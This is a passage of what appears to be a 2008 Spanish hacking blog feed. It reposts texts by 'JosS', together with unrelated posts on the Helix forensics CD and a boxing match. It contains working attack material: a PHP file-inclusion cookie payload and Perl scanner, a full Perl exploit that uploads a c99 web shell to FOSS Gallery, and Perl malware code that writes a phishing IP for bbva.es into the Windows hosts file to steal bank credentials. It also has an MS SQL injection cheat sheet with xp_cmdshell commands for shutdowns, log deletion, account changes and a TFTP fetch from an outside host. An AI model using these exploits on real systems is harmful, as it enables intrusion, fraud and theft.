con los 'IF GETS' más la vulnerabilidad que permite el manejo de la 'COOKIE'.

[code #4]

x:  >...
if (isset($_GET["mode"]))
  {
    if ($_GET["mode"]=="edit")
  {
   if (isset($_GET['id']))
   {
     $notefile = $_COOKIE['note'];
   if ($notefile == "new")
   {
    $title = "";
    $notes = "";
   }
   else
   {
    $temp = "notes/" . $notefile;
    require($temp);
   }
x:  <...
x: }}}

[ENDcode #4]

No voy a explicar nuevamente paso a paso lo que hace este código, ya que lo vimos
en el ejemplo 1 de este apartado.

Tenemos que tener en cuenta que para que nuestro de valor de '$_COOKIE' se incluya
debemos dar positivo a los 'IF' que nos ayudan a llegar al include de nuestra
'COOKIE'. Entonces nos quedamos con estos dos exploits.

Exploit 1:
javascript:document.cookie="note=../../../../../../../../../../etc/passwd; path=/";

Exploit 2: ?mode=edit&id


------[ 0x02.- Exploits ]

Yo más bien los llamaría "automatizadores" ya que no hacen nada más que simplificar
el proceso y comodidad del usuario. El ejemplo está programado en Perl, ya que
junto a python es lo que más se usa en estos casos. Veamos el código que os tengo
preparado.

[code #1]

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

if (!$ARGV[0])
{
print "Usage: perl xpl.pl [HOST]\n";
print "Example: perl xpl.pl http://localhost/path/\n";
}

else
{

$web=$ARGV[0];
chomp $web;

$iny="vuln.php?vuln=../../../../../../../../../../../../../../../../etc/passwd";

my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}}

[ENDcode #1]

El exploit es simple y no tiene mucho misterio. Hacemos uso del módulo 'LWP' para hacer
nuestra conexión a la web (con la inyección de explotación incluida) y mediante una
expresión regular buscamos que se haya incluido el archivo y si es así lo muestra, en caso
contrario sale un mensaje de error.


------[ 0x03.- Cŕeditos ]

Author: JosS
mail: sys-project[at]hotmail[dot]com
site: http://spanish-hackers.com
team: Spanish Hackers Team - [SHT]

work fun!

__EOF__

Helix Live Distro3.0

noreply@blogger.com (r3b1rth X) — Tue, 14 Oct 2008 22:52:36 PDT

Helix se encuentra disponible como descarga gratuita una imagen ISO. cabe en un 700 CD-R (W). Grabar con su CD favorito de escritura de software y, a continuación, arrancar desde el CD o insertarlo en un sistema en funcionamiento. Desde que Helix es libre de lo que se refiere sin ningún tipo de apoyo oficial. Si usted tiene preguntas leer los cambios y comprobar los foros.

¿Qué es Helix

Helix es una distribución Basada en Ubuntu Linux. Helix es algo más que un Live CD de arranque. Todavía puede arrancar un entorno Linux personalizado que incluye kernel de Linux personalizado, excelente detección de hardware y muchas aplicaciones dedicada a la Respuesta a Incidentes y Forense.

Helix se ha modificado mucho cuidado de no tocar el equipo host en modo alguno, y es forense de sonido. Helix Wil auto no se montara en el espacio de intercambio, o montar cualquier auto los dispositivos conectados. Helix también tiene un lado especial en vivo de Respuesta a Incidentes y Forense.

Helix se centra en la Respuesta a Incidentes y herramientas forenses. Está destinada a ser utilizada por personas que tienen una buena comprensión de Respuesta a Incidentes y técnicas forenses.

Para Descargar Esta Live Cd Visita El Sitio Oficial o Descargala Desde

Aqui

Para Mas Info:

Aqui

Saludos

Juan Manuel Lopez OWNEA a Figueroa en el primer asalto

noreply@blogger.com (r3b1rth X) — Sun, 05 Oct 2008 20:36:07 PDT

NO tiene que ver nada con la seguridad pero despues de toda la mierda que hablo este tipo salio OWNEADO xdddddd...

Juan Manuel Lopez noquea a Figueroa en el primer asalto

Juan Manuel Lopez combates de boxeoJuan Manuel López logro vencer por KO en el primer asalto al mexicano César Figueroa, logrando así la primera defensa de su corona mundial supergallo de la OMB e hizo un llamado a Israel "Magnífico" Vázquez para unificar la division.

En el primer asalto hubo un fuerte intercambio de golpes donde Lopez envio a la lona a Figueroa, el arbitro Roberto Ramírez aplico la cuenta de 10 la cual el mexicano no pudo responder. Lopez retiene la corona que le gano a otro mexicano en Daniel Ponce De León el pasado 7 junio al cual también derroto por KO en el primer asalto.

La meta es Vázquez, ahora mismo ese es el norte. Posiblemente si la promotora acata los planes de mi grupo pelearé ante Vásquez el otro año", agrego López en su vestidor momentos antes de su pelea contra Figueroa.

FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit by JosS

noreply@blogger.com (r3b1rth X) — Sun, 05 Oct 2008 14:45:46 PDT

Read Source:

Código:

# FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit
# url: http://downloads.sourceforge.net/fossgallery/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# OUTPUT:
#
# Exploited sucessfully.
#
# [+] Info:
# Linux h4x0rz 2.6.18-6-686 #1 SMP Mon Aug 18 08:42:39 UTC 2008 i686
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Safe Mode: OFF (not secure)
#
# joss@h4x0rz:~/Desktop$

use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Headers;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
}
}

my ($host, $file) = @ARGV ;

if (!$ARGV[0]) {

&lw;
print "\n[x] FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit\n";
print "[x] written by JosS - sys-project[at]hotmail.com\n";
print "[x] http://www.spanish-hackers.com/\n\n";
print "Usage: $0 [host] [file] \n";
print "if doesn't exist the file: file default is phpshell C99\n\n";
exit;
}
if (!$ARGV[1])
{
$file="c99.php";
}

&lw;

$host = 'http://'.$host if ($host !~ /^http:/);
$host .= "/" if ($host !~ /\/\$/);

my $ua = LWP::UserAgent->new();
$ua->timeout(12);
my $request = HTTP::Request->new();
my $response;
my $header;
my $url = $host."processFiles.php";

$response = $ua->request(POST $url, Content_Type => 'form-data',
Content => [ uploadNeed => "1", uploadFile0 => [$file]]);
$content = $response->content;

if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; }
else { print "\nExploit failed\n"; exit;}

my $c99="c99.php";
chomp ($c99);

if ($file =~ /c99.php/)
{

$comando="?act=cmd&d=/&cmd=/&cmd_txt=1&submit=Execute";

print "\n";

my $final = $host.$c99.$comando;

my $ua = LWP::UserAgent->new;

my $req = HTTP::Request->new(GET => $final);

$ua->timeout(10);

$doc = $ua->request($req)->as_string;

$kernel = $1 if ( $doc =~ m/-a: (.*?)\<\/b>/mosix);
$id = $1 if ( $doc =~ m/<*b>uid (.*?)\<\/b>/mosix);

$safe = $1 if ( $doc =~ m/color=green> (.*?)\<\/font>/mosix);

print "[+] Info:\n";

print " $kernel\n";
print " uid$id\n";

print " Safe Mode: $safe\n";

print "\n";

}

EOF
############################################333

con Proteccion Anti Script Kiddies xD ............

saludos

Pharming Basics by JosS

noreply@blogger.com (r3b1rth X) — Wed, 01 Oct 2008 19:39:00 PDT

print "\t\t########################################################\n\n";
print "\t\t# Pharming.txt - Spanish Hackers Team #\n\n";
print "\t\t# by JosS #\n\n";
print "\t\t########################################################\n\n";

##Pharming.

Hola a todos!.

Hoy [21-9-07] me gustaría hablarles del pharming, principalmente de su uso y abuso.
Es una vulnerabilidad que reside en los servidores DNS, aquellos servidores que
transforman URLs a IPs. La vulnerabilidad tiene varios usos y muchos de ellos son
fines no legales, como puede ser el Phising, una de las prioridades de esta vuln.

Más que nada quiero enfocar este manual al uso práctico de virus creados para el robo
de credenciales.

##Hosts.

En todos los sistemas operativos, ya sean de particulares o empresas
poseen un archivo llamado 'hosts' en el se encuentran las URLs y las IPs a las que se
dirigen.
Si nosotros podemos escribir en ese archivo 'hosts' podríamos hacer que al entrar a
google.com fuera a www.zone-h.org. Veamos un ejemplo:

127.0.0.1 localhost

Esto quiere decir que localhost se resuelve como 127.0.0.1, es por ello por lo que cuando
ponemos localhost en nuestro navegador nos dirigimos a nuestra máquina.

##Rutas.

# Windows 95/98/Me: C:\Windows\Hosts
# Windows NT/2000: C:\WINNT\System32\drivers\etc
# Windows XP: C:\WINDOWS\system32\drivers\etc
# Windows 2003: C:\WINDOWS\system32\drivers\etc
# Windows Vista: C:\WINDOWS\system32\drivers\etc
# Unix (en general): /etc/hosts
# Linux (en general): /etc/hosts
# MacOS (en general): /etc/hosts

En esos directorios se encuetra un archivo llamado 'hosts'. El cual podemos modificar a
nuestro gusto.

##Code.

Si queremos crear un virus dedicado al robo de credenciales bancarias el uso de la técnica
Pharming nos dará muchos resultados.
Imaginemos que tenemos un Scam del 'Banco BBVA' en la IP = 85.235.65.99 y qeremos que la
víctima que a sido infectada por el virus al entrar a la web oficial del 'Banco BBVA',
redireccione a nuestro Scam. Para eso haríamos esto:

85.235.65.99 bbva.es

La programación del virus:

my $mensaje = "85.235.65.99 bbva.es";

$dir = ' C:\WINDOWS\system32\drivers\etc\hosts ';

open (HOSTS, ">>$dir");

print HOSTS $mensaje;

# spanish-hackers.com

Source:
Spanish Hackers Team

MS SQL Injecting (TSQL commands) By JosS

noreply@blogger.com (r3b1rth X) — Thu, 25 Sep 2008 01:04:03 PDT

Source: http://www.www.spanish-hackers.com

-[ INFO ]---------------------------------------------------------------------
Title: MS SQL Injecting (TSQL commands)
Author: JosS
contact: sys-project[!]hotmail.com
site: http://spanish-hackers.com/

Spanish Hackers Team - [SHT]
EspSeC & Hack0wn!
from spain

* Spanish version -//

-[ INDEX ]---------------------------------------------------------------------
0x01: Introducción
0x02: Comandos
0x03: Caracteres
0x04: Variables
0x05: Tablas
0x06: Procedimientos
0x07: Exploits (hacking)

0x08: JosS

####### ---[ 0x01: Introducción ]--- #######

Los ataques de SQL Injection nos permiten diferentes puntos y modos de
ataque dependiendo del gestor de Base de Datos que se utilice, cada gestor
tiene sus propias características y lenguaje (Estructured Query language).
En este texto nos vamos a centrar en el gestor de base de datos de
'Microsoft' (MS SQL), el cual utiliza su propio lenguaje, llamado TSQL (Transact sql).
El motivo de elegir este objetivo como partida de nuestros ataques es por la poca
documentación que se encuentra sobre la explotación de esta.

He hay la cuestión.

####### ---[ 0x02: Comandos ]--- #######

- Determina la base de datos sobre la que se realizará la consulta.
use 'x'
use master select * from sysobjects

- Selección de los campos separados por comas dentro de la tabla seleccionada.
select 'x'
select username, password from users

- Carácter comodín.
*
select * from users

- Selección de tablas separadas por comas.
from 'x'
select * from tabla1,tabla2

- Determina una condición a cumplir.
where 'x'
select username,password from users where id=0 or id=1

- Permite ordenar los registros por las columnas deseadas.
order by 'x'
select username, password from users order by username Desc

- Permite realizar agrupaciones de registros.
group by 'x'
select count(rol) as cuenta, rol from usuarios group by rol

- Une dos sentencias sql en una sola.
union
select * from users union select * from users2

- Devuelve todos los campos de las tablas.
all
select * from users union all select * from users2

- Devuelve un determinado número de registros de la tabla.
top
select top 1 from users

- Permite borrar registros, archivos, etc.
delete
delete from users

- Quita todas las filas de una tabla sin registrar las eliminaciones.
truncate
truncate users

- Modifica valores de una tabla.
update
update users set pass='xxx'

- Inserta valores en una tabla.
insert
insert into users values ('joss',null)

- Permite crear objetos en la BD.
create

- Permite destruir objetos en la BD.
drop

- Permite modificar objetos en la BD.
alter

- Termina un proceso de usuario basado en el Id.
kill 'x'
kill 53

- Convierte las expresiones en otros tipos de datos.
cast
cast (expresión AS tipo de datos)

####### ---[ 0x03: Caracteres ]--- #######

- Delimitador de consultas para lanzar la sentencia actual.
;

- Delimitador de cadenas de datos de caracteres y fechas.
'

- Delimitador de comentarios.
--
select * from users-- esto no lo ejecuta

- delimitador de comentarios.
/*'x'*/
select * from users/* esto no lo ejecuta*/

- Da inicio al nombre de procedimientos almacenados.
xp_sp_

- Llamada a un procedimiento almacenado o función.
exec
execute

- Carácter de concatenación
+
select+username+from+users

####### ---[ 0x04: Variables ]--- #######

- Fecha y hora actuales.
current_timestamp

- Nombre de usuario de la BD que realiza la inserción.
current_user

- Nombre de usuario de sesión que realiza la inserción.
session_user

- Nombre de usuario de sistema que realiza la inserción.
system_user

- 0 si la instrucción TSQL anterior no encontró errores.
@@error

- Número de transacciones activas de la conexión.
@@tracount

- Id de la estación de trabajo.
host_id

- Nombre de la estación de trabajo.
host_name

- Nos da las estadísticas de entrada y salida de los archivos de BD.
fn_virtualfilestats
select * from :: fn_virtualfilestats(1,1)

- Información de los archivos de las distintas Base de Datos.
sys.master_files

- Contiene los nombres de las unidades compartidas por el servidor.
fn_servershareddrives

####### ---[ 0x05: Tablas ]--- #######

- syscolumns, almacena las columnas de cada tabla con sus propiedades.
- sysdepends, almacena las dependencias de unos objetos con otros en la BD.
- sysfilegroups, asocia los grupos ficheros (mdf, ldf, etc) de la BD a los ficheros en sí.
- sysfiles, almacenan los ficheros físicos en sí con su ruta correspondiente.
- sysforeignkeys, almacenan las claves foráneas de la BD.
- sysfulltextcatalogs, guarda información de los catálogos de sistema.
- sysindexes, guarda todas las indexaciones de combinaciones de campos sobre tablas de la BD.
- syspermissions, guarda permisos sobre los objetos de la BD.
- sysproperties, guarda descripciones de tablas y campos del modelo relacional.
- sysprotectsque, guarda información de permisos asociados a las cuentas de seguridad de la BD.
- sysreferences, guarda la información de las relaciones entre tablas de la BD.
- systypes, tipos de datos posbiles a definir en el gestor de BDsystypes.
- sysusers, roles de inicios de sesión posibles en la BD.

- sysfulltextnotify, syscursocolumns, syscursorrefs, syscursors, syscursortables, sysfiles1,
syslocks, sysxlogins, etc...

####### ---[ 0x06: Procedimientos ]--- #######

sp_addalias
sp_addapprole
sp_addgroup
sp_addlinkedsrvlogin
sp_addlogin
sp_addrole
sp_addrolemember
sp_addumpdevice
sp_adduser
sp_altermessage
sp_approlepassword
sp_change_users_login
sp_changedbowner
sp_changegroup
sp_changeobjectowner
sp_configure
sp_dbcmptlevel
sp_dboption (update)
sp_dboption update part
sp_defaultdb
sp_defaultlanguage
sp_denylogin
sp_diskdefault
sp_dropalias
sp_dropapprole
sp_dropdevice
sp_dropgroup
sp_droplinkedsrvlogin
sp_droplogin
sp_dropremotelogin
sp_droprole
sp_droprolemember
sp_dropuser
sp_fulltext_catalog
sp_fulltext_column
sp_fulltext_database
sp_fulltext_service
sp_fulltext_table
sp_grantdbaccess
sp_grantlogin
sp_helplogins
sp_password
sp_recompile
sp_refreshview
sp_remoteoption
sp_remoteoption (update)
sp_rename
sp_renamedb
sp_revokedbaccess
sp_revokelogin
sp_tableoption
sp_updatestats

(BOF)-->

xp_controlqueueservice
xp_createprivatequeue
xp_createqueue
xp_decodeq ueuecmd
xp_deleteprivatequeue
xp_deletequeue
xp_displayqueuemesgs
xp_dsninfo
xp_mergelineages
xp_oledbinfo
xp_proxiedmetadata
xp_readpkfromqueue
xp_readpkfromvar bin
xp_repl_encrypt
xp_resetqueue
xp_sqlinventory
xp_unpackcab

####### ---[ 0x07: Exploits ]--- #######

- Nombres de las distintas base de datos existentes en el gestor de BD:
use master select * from sysdatabases

- Obtenemos todas las tablas de todas las base de datos:
select * from sysobjects where xtype = 'U'

- Obtenemos los nombres de todas las tablas contenidas en la base de datos ('x'):
use 'x' select * from sysobjects where xtype = 'U'
use users select * from sysobjects where xtype = 'U'

- Obtenemos todo el código TSQL dado de alta en la BD:
select * from syscomments

- Obtenemos los procedimientos almacenados que usan las tablas o campos donde se manejan cuentas:
select * from syscomments where text like '%cuentas%'

- Obtenemos el inicio de sesión actual:
select current_user

- Obtenemos el usuario de la Base de Datos:
select user

- Obtenemos la versión de SQL Server:
select @@version

- Obtenemos la fecha actual del servidor:
select getdate()

- Información referente a los inicios de sesión del gestor de base de datos:
use master select name from sysxlogins
select name, password from sysxlogins

- Bases de datos existentes en el servidor:
use master select name from sysdatabases

- Leer archivos del sistema:
exec master..xp_readerrorlog 1,N'c:\boot.ini'

- Leer el registro de Windows:
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Setup','SQLpath'
exec xp_instance_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Setup','SQLpath'

- Utilización de waitfor:
select * from 'x' waitfor delay '00:00:10'
select * from users waitfor delay '00:00:10'

- Denegación de servicio:
'; delete table usuarios--
'; xp_cmdshell ('shutdown')--

- Consultar y alterar archivos en el servidor:
exec master..xp_cmdshell 'COPY c:\winnt\system32\cmd.exe c:\inetpub\wwwroot\chroot.exe'
exec master..xp_cmdshell 'DIR c:\winnt\system32\logfiles\w3svc1\'

- Parar servicios:
exec master..xp_cmdshell 'NET STOP "Servicio de publicación de World Wide Web"'

- Borrado de huellas:
exec master..xp_cmdshell 'DEL c:\winnt\system32\logfiles\w3svc1|filelog.log'

- Iniciar un servicio:
exec master..xp_cmdshell 'NET START "Servicio de publicación de World Wide Web"'

- Cambiar datos de la cuenta de usuarios de Windows:
exec master..xp_cmdshell 'NET USER username password'

- Añadir un usuario al inicio de sesión del gestor de base de datos:
'exec master..sp_addlogin MyUser, MyPass

- Mover archivos desde otras ubicaciones:
execute master..xp_cmdshell 'TFTP -i www.spanish-hackers.com GET c:\local_file c:\remote_file'

- Creación de consultas encriptadas:
create procedure 'x' with encryption as select * from users
create procedure pp with encryption as select * from users

- Rootkits:
use master exec sp_addextendedproc 'mi_rootkit', 'c:\Archivos de programa\Microsoft SQLServer\
MSSQL\Binn\xplog70.dll' GO

- Backup:
'; use master BACKUP DATABASE [master] TO DISK = N'C:\h' WITH NOINIT, NOUNLOAD, NAME = N'C',
NOSKIP, STATS = 10, NOFORMAT--

####### ---[ 0x08: JosS ]--- #######

Jose Luis Góngora Fernández (JosS)

In memory of rgod.

Take care,
/JosS

# spanish-hackers.com